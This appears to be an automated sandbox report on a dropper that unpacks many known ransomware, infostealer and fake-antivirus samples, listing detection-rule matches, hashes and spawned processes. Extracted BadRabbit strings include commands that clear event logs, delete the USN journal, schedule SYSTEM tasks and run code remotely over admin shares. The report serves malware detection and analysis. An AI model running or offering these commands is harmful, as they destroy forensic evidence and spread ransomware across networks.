          Source: 23.0.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 56.0.Endermanch@InfinityCrypt.exe.6631cc.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_InfinityLock author = ditekSHen, description = Detects InfinityLock ransomware
          Source: 20.2.rundll32.exe.4e20000.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 20.2.rundll32.exe.4e20000.2.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 20.3.rundll32.exe.1242f28.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 20.3.rundll32.exe.1242f28.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 23.0.Endermanch@Cerber5.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 16.0.Endermanch@BadRabbit.exe.1100000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 44.0.870F.tmp.7ff745e00000.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 44.0.870F.tmp.7ff745e00000.2.unpack, type: UNPACKEDPEMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: 16.0.Endermanch@BadRabbit.exe.1100000.3.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 20.3.rundll32.exe.1242f28.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 20.3.rundll32.exe.11c5380.3.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 20.3.rundll32.exe.11c5380.3.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 20.3.rundll32.exe.11c5380.3.raw.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 20.3.rundll32.exe.11c5380.3.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 20.3.rundll32.exe.1242f28.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 56.0.Endermanch@InfinityCrypt.exe.660000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_InfinityLock author = ditekSHen, description = Detects InfinityLock ransomware
          Source: 20.2.rundll32.exe.11c5380.0.raw.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 20.2.rundll32.exe.11c5380.0.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000002C.00000002.483707554.00007FF745E0E000.00000004.00000001.01000000.0000001E.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: 00000017.00000000.422069094.0000000000448000.00000020.00000001.01000000.00000014.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 0000002C.00000000.445036996.00007FF745E0E000.00000008.00000001.01000000.0000001E.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: 00000017.00000000.415804257.0000000000448000.00000020.00000001.01000000.00000014.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 00000017.00000000.420463459.0000000000448000.00000020.00000001.01000000.00000014.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 00000017.00000000.406263679.0000000000448000.00000020.00000001.01000000.00000014.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 00000014.00000003.431911084.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
          Source: 0000002C.00000000.440637562.00007FF745E0E000.00000008.00000001.01000000.0000001E.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: 0000002C.00000000.443106699.00007FF745E0E000.00000008.00000001.01000000.0000001E.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: Process Memory Space: rundll32.exe PID: 4900, type: MEMORYSTRMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe, type: DROPPEDMatched rule: MALWARE_Win_InfinityLock author = ditekSHen, description = Detects InfinityLock ransomware
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exe, type: DROPPEDMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
          Source: C:\Users\user\Desktop\Fantom.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exe, type: DROPPEDMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: C:\Users\user\Desktop\Endermanch@Petya.A.exe, type: DROPPEDMatched rule: Petya_Ransomware date = 2016-03-24, author = Florian Roth, description = Detects Petya Ransomware, reference = http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html, hash = 26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739
          Source: C:\Users\user\Desktop\Endermanch@Petya.A.exe, type: DROPPEDMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
          Source: C:\Windows\cscc.dat, type: DROPPEDMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile deleted: C:\Windows\__tmp_rar_sfx_access_check_24666781Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E28A23 InitiateSystemShutdownExW,ExitWindowsEx,ExitProcess,20_2_04E28A23
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\__tmp_rar_sfx_access_check_24666781Jump to behavior
          Source: C:\Windows\302746537.exeCode function: 15_2_00407E1A sprintf,GetPropA,HeapFree,HeapFree,HeapFree,RemovePropA,CallWindowProcA,NtdllDefWindowProc_A,15_2_00407E1A
          Source: C:\Windows\302746537.exeCode function: 15_2_00404714 GetWindowLongA,CallWindowProcA,RemovePropA,RemovePropA,RemovePropA,RevokeDragDrop,SetWindowLongA,NtdllDefWindowProc_A,15_2_00404714
          Source: C:\Windows\302746537.exeCode function: 15_2_00405B1F GetPropA,DefFrameProcA,SetLastError,NtdllDefWindowProc_A,15_2_00405B1F
          Source: Endermanch@WannaCrypt0r.exe.0.drStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate
          Source: Endermanch@InternetSecurityGuard.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
          Source: Endermanch@InternetSecurityGuard.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: Resource name: RT_RCDATA type: DOS executable (COM, 0x8C-variant)
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: Resource name: RT_RCDATA type: COM executable for DOS
          Source: Endermanch@VAV2008.exe.0.drStatic PE information: Resource name: RT_DIALOG type: DOS executable (COM, 0x8C-variant)
          Source: Endermanch@PolyRansom.exe.0.drStatic PE information: No import functions for PE file found
          Source: Endermanch@ViraLock.exe.0.drStatic PE information: No import functions for PE file found
          Source: bpkAAJptGv.exe, 00000000.00000000.251758209.00000291C3638000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamed.exe$ vs bpkAAJptGv.exe
          Source: bpkAAJptGv.exeBinary or memory string: OriginalFilenamed.exe$ vs bpkAAJptGv.exe
          Source: bpkAAJptGv.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Endermanch@NoMoreRansom.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Endermanch@AntivirusPro2017.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Endermanch@HappyAntivirus.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Endermanch@Movie.mpeg.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
          Source: Fantom.exe.0.drStatic PE information: Section: .rsrc ZLIB complexity 0.9916272410358565
          Source: Endermanch@Xyeta.exe.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9942863805970149
          Source: Endermanch@InternetSecurityGuard.exe.0.drStatic PE information: Section: .rdata ZLIB complexity 1.0416666666666667
          Source: Endermanch@SecurityCentral.exe.0.drStatic PE information: Section: .rsrc ZLIB complexity 0.9893345463538722
          Source: Endermanch@SecurityDefender.exe.0.drStatic PE information: Section: .data ZLIB complexity 0.9999101413973384
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: Section: ZLIB complexity 1.0005126953125
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: Section: ZLIB complexity 1.0005296610169492
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: Section: ZLIB complexity 1.021484375
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: Section: .rsrc ZLIB complexity 0.9944190347101134
          Source: Endermanch@VAV2008.exe.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9890534156976745
          Source: bpkAAJptGv.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\antivirus-platinum.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\BadRabbit.zipJump to behavior
          Source: classification engineClassification label: mal100.rans.spre.troj.spyw.expl.evad.winEXE@116/215@70/100
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,20_2_04E21368
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,20_2_04E29534
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E29534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,20_2_04E29534
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 12_2_004096AF GetModuleHandleA,FindResourceA,12_2_004096AF
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeFile created: C:\Program Files (x86)\antiviruspc2009
          Source: Endermanch@SecurityCentral.exe.0.drBinary or memory string: .vbp.1\deVBFSG_new\deVBFSG.vbpP
          Source: rundll32.exe, 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted*..Readme.txt%s-h-f%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhost0.0.0.0\rundll32.exe%ws C:\Windows\%ws,#1 %wsSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilege%08X%08X/c %ws%wswevtutil cl %ws & SetupSystemSecurityApplicationfsutil usn deletejournal /D %c:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00schtasks /Delete /F /TN drogon255.255.255.255%u.%u.%u.%uC:\Windows\System32\rundll32.exe "C:\Windows\",#2 \\%s\admin$\\%ws\admin$\%wsprocess call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "wbem\wmic.exe%ws WaitForMultipleObjectskernel32
          Source: rundll32.exe, 00000014.00000003.431911084.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, dispci.exe.20.drBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted%lS OK
          Source: C:\Windows\302746537.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\341C.tmp\302746537.bat" "
          Source: bpkAAJptGv.exeReversingLabs: Detection: 53%
          Source: bpkAAJptGv.exeMetadefender: Detection: 21%
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile read: C:\Users\user\Desktop\bpkAAJptGv.exe:Zone.IdentifierJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\bpkAAJptGv.exe "C:\Users\user\Desktop\bpkAAJptGv.exe"
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
          Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\bpkAAJptGv.exe "C:\Users\user\Desktop\bpkAAJptGv.exe"
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@Antivirus.exe "C:\Users\user\Desktop\Endermanch@Antivirus.exe"
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe "C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe"
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe "C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe"
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@AnViPC2009.exe "C:\Users\user\Desktop\Endermanch@AnViPC2009.exe"
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeProcess created: C:\Windows\302746537.exe "C:\WINDOWS\302746537.exe"
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@BadRabbit.exe "C:\Users\user\Desktop\Endermanch@BadRabbit.exe"
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@Birele.exe "C:\Users\user\Desktop\Endermanch@Birele.exe"
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\302746537.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\341C.tmp\302746537.bat" "
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
